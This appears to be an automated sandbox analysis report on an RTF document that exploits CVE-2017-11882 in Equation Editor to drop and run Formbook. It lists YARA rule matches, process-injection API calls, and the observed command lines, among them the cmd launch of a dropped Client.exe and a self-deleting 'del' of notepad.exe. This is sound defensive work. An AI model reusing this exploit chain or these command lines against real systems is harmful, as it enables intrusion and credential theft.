          Source: 00000009.00000002.1043648372.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000000.939194134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000000.939194134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000000.939194134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000000.938868025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000000.938868025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000000.938868025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.1175496063.0000000000290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000B.00000002.1175496063.0000000000290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.1175496063.0000000000290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000000.948326848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000000.948326848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000000.948326848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.958771208.0000000003666000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000002.958771208.0000000003666000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.958771208.0000000003666000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.1175083933.0000000000080000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000B.00000002.1175083933.0000000000080000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.1175083933.0000000000080000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.987721089.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000A.00000000.987721089.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000000.987721089.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.1004582452.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000A.00000000.1004582452.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000000.1004582452.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: Client.exe PID: 316, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: notepad.exe PID: 2188, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: ipconfig.exe PID: 1800, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4F98E955-E40B-4BEE-AA1E-253D7E3CD6E7}.tmp, type: DROPPEDMatched rule: rtf_cve2017_11882_ole author = John Davison, description = Attempts to identify the exploit CVE 2017 11882, score = , sample = 51cf2a6c0c1a29abca9fd13cb22421da, reference = https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4F98E955-E40B-4BEE-AA1E-253D7E3CD6E7}.tmp, type: DROPPEDMatched rule: EXP_potential_CVE_2017_11882 author = ReversingLabs, reference = https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-cobalt-strike-payload-exploiting-cve-2017-11882.html
          Source: C:\Windows\SysWOW64\notepad.exeCode function: String function: 00AF3F92 appears 132 times
          Source: C:\Windows\SysWOW64\notepad.exeCode function: String function: 00AF373B appears 245 times
          Source: C:\Windows\SysWOW64\notepad.exeCode function: String function: 00AAE2A8 appears 38 times
          Source: C:\Windows\SysWOW64\notepad.exeCode function: String function: 00B1F970 appears 84 times
          Source: C:\Windows\SysWOW64\notepad.exeCode function: String function: 00AADF5C appears 121 times
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_00322548 NtQuerySystemInformation,
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_00322540 NtQuerySystemInformation,
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_0037F248 NtResumeThread,
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_0037D898 NtWriteVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_0037CE80 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_0037D398 NtProtectVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_0037DD98 NtSetContextThread,
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_004A0178 NtClose,
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_0240B2E0 NtWriteVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_0240B7B0 NtCreateThreadEx,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_0041A360 NtCreateFile,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_0041A410 NtReadFile,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_0041A490 NtClose,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_0041A540 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_0041A35A NtCreateFile,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_0041A40A NtReadFile,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_0041A48F NtClose,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_0041A53C NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AA00C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AA0078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AA0048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00A9F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00A9F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00A9FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00A9FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00A9FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00A9FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00A9FC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00A9FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00A9FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00A9FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00A9FEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00A9FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00A9FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AA10D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AA0060 NtQuerySection,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AA01D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AA010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AA1148 NtOpenThread,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AA07AC NtCreateMutant,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00A9F8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00A9F938 NtWriteFile,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AA1930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00A9FAB8 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00A9FA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00A9FA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00A9FBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00A9FB50 NtCreateKey,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00A9FC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00A9FC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AA0C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AA1D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00A9FD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00A9FE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00A9FFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00A9FF34 NtQueueApcThread,
          Source: Client.exe.0.drStatic PE information: Section: 5++.8$ ZLIB complexity 1.0003371646578538
          Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.LNK.0.drLNK file: ..\..\..\..\..\Desktop\SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtf
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$curiteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtfJump to behavior
          Source: classification engineClassification label: mal100.troj.expl.evad.winRTF@11/9@2/2
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: explorer.exe, 0000000A.00000000.1030986946.0000000003B10000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: .VBPud<_
          Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtfVirustotal: Detection: 43%
          Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtfReversingLabs: Detection: 21%
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\SysWOW64\cmd.exeConsole Write: ................................C.:.\.W.i.n.d.o.w.s.\.S.y.s.W.O.W.6.4.\.n.o.t.e.p.a.d...e.x.e...........................B.........0.......0.....
          Source: C:\Windows\SysWOW64\cmd.exeConsole Write: ......................0.........A.c.c.e.s.s. .i.s. .d.e.n.i.e.d.........P1P.......4.t...........0.......................&.................0.....
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\cmd.exe CmD.exe /C %tmp%\Client.exe A C
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\Client.exe C:\Users\user\AppData\Local\Temp\Client.exe A C
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess created: C:\Windows\SysWOW64\notepad.exe C:\Windows\SysWOW64\notepad.exe /Processid:{2BA893A4-E786-4AE6-9111-3506DE199247}
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\notepad.exe"
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\cmd.exe CmD.exe /C %tmp%\Client.exe A C
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\Client.exe C:\Users\user\AppData\Local\Temp\Client.exe A C
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess created: C:\Windows\SysWOW64\notepad.exe C:\Windows\SysWOW64\notepad.exe /Processid:{2BA893A4-E786-4AE6-9111-3506DE199247}
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\notepad.exe"
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR5B39.tmpJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Client.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtfStatic file information: File size 2870044 > 1048576
          Source: Binary string: ipconfig.pdb source: notepad.exe, 00000009.00000003.1040858153.000000000081C000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000009.00000002.1043409063.0000000000030000.00000040.10000000.00040000.00000000.sdmp, notepad.exe, 00000009.00000002.1044510525.0000000000822000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ipconfig.pdbN source: notepad.exe, 00000009.00000003.1040858153.000000000081C000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000009.00000002.1043409063.0000000000030000.00000040.10000000.00040000.00000000.sdmp, notepad.exe, 00000009.00000002.1044510525.0000000000822000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: notepad.pdb source: ipconfig.exe, 0000000B.00000002.1177312343.000000000271F000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 0000000B.00000002.1175813159.0000000000444000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: notepad.exe, notepad.exe, 00000009.00000003.950924763.0000000000900000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000009.00000002.1046378480.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, notepad.exe, 00000009.00000003.949038674.00000000002A0000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000009.00000002.1044571883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 0000000B.00000002.1176285668.0000000002220000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 0000000B.00000003.1044991591.0000000002090000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: notepad.pdbx source: ipconfig.exe, 0000000B.00000002.1177312343.000000000271F000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 0000000B.00000002.1175813159.0000000000444000.00000004.00000020.00020000.00000000.sdmp
          Source: ~WRF{4F98E955-E40B-4BEE-AA1E-253D7E3CD6E7}.tmp.0.drInitial sample: OLE indicators vbamacros = False
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_00A286CE push es; ret
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_00A24403 push esi; ret
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_003290F2 pushfd ; ret
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_003290DA push esp; ret
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_00328F38 push eax; retn 002Dh
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_003606AF push 036C4A39h; ret
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_004AA4B6 push esi; iretd
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_004AA8B5 push edi; retf
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_004D7CC7 push ecx; ret
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_004D7112 push es; iretd
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_00873EBF push ebx; retf
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_00873ABB push edi; iretd
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_008746BB push edx; ret
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_0087051F push es; iretd
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_02407248 push 00000003h; ret
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_02401E4D push 00000003h; ret
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_02404E5A push 00000003h; ret
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_02403E63 push 00000003h; ret
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_02402671 push 00000003h; ret
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_02402E71 push 00000003h; ret
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_02406671 push 00000003h; ret
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_02404672 push 00000003h; ret
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_0240261D push 00000003h; ret
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_02406220 push 00000003h; ret
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_02400A22 push 00000003h; ret
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_02403E22 push 00000003h; ret
